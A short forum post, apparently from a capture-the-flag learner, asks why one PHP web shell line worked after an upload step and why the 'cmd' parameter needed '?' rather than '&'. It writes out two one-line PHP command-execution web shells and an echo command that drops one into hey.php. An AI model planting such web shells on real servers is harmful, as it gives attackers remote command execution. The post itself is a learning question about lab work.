Hello all. I’m still learning and I was able to get to the upload page with the help of the writeup. I wonder why I had to use
<?php echo system($_REQUEST['cmd']);?>instead of
<?php system($_GET['cmd']); ?>
Why is the GET shell not working? I added &cmd=id at the end in the browser and the server returned an error 404.
Edit: I’m confused. echo ‘<?php echo system($_REQUEST["cmd"]);?>’ > hey.php didn’t work either.
Edit2: Both worked but I had to add ? for the cmd parameter instead of &. I remember I used webshells in the past and I had to give the cmd parameter & and not ?. Can anybody explain?